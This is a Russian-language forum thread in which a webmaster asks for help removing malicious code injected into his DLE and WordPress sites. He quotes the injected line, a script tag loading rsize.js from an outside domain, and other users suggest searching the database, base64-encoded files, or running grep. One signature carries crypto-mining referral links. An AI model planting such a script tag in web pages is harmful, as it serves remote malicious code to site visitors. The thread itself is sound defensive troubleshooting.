Вредоносный код на сайте.

VA
На сайте с 12.12.2012
Offline
8
699

Добрый день.

Судя по обстоятельствам мой фтп-аккаунт кто-то взломал и закинул вирусный код.

Пароль к фтп аккаунту сменил, но вирус то остался

Сайты - клик, клик 2 .

Первый сайт на DLE 9.5. Второй - Wordpress

Вредоносный код я нашел в конце двух сайтов, после тега </html></body>.

Вредоносный код в виде скрипта:

<script src="http://pakesrry.info/rsize.js"></script>

В файлах шаблонов (.tpl) этого кода нету. Дописываеться автоматически в конце каждой страницы

А теперь вопрос:

Как убрать этот код, и где его искать?:confused:

Спасибо.

[Удален]
#1

Добрый день.

Смотрите в базе данных. Или как второй вариант - в файлах но зашифрован в base64 например.

[Удален]
#2

И еще вариант поискать во всех файлах, если есть ssh доступ:

grep -iRnH "rsize.js" путь_к_директории
N
На сайте с 17.06.2013
Offline
12
#3
Valentin Atroschenko:
Судя по обстоятельствам мой фтп-аккаунт кто-то взломал и закинул вирусный код.

Не факт что фтп был вскрыт. БД можно вскрыть без фтп.

Любимый цвет: зелёный
VA
На сайте с 12.12.2012
Offline
8
#4

Всё, тему можна закрывать, проблема решена.

Спасибо kgtu5.:)

BG
На сайте с 03.10.2010
Offline
195
#5

Если разные движки а код в одном месте тогда видимо в файле Index.php был, я прав?

-= Сайты на заказ | Правки, обновление, работы по DLE =- ( /ru/forum/791118 ) Telegram: @ruslansh ( tg://resolve?domain=ruslansh )
DeL Esprit
На сайте с 27.01.2010
Offline
223
#6
Valentin Atroschenko:
Всё, тему можна закрывать, проблема решена.

Спасибо kgtu5.:)

вы бы писали как решили и где код был. вот тебе бы было приятно загуглить - и найти решение?

Тестирую облачный майнинг - узнаем развод или нет. - окупаемость 3 месяца? мелкие суммы (https://goo.gl/aPWmoj) | майнинг Monero, минимум $830 (https://goo.gl/3XivbP) Биржи (ввод/вывод) - на Приват (https://goo.gl/CGZTnD), на Payeer, Capitalist, Advcash, Qiwi... (https://goo.gl/eejAgs)

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий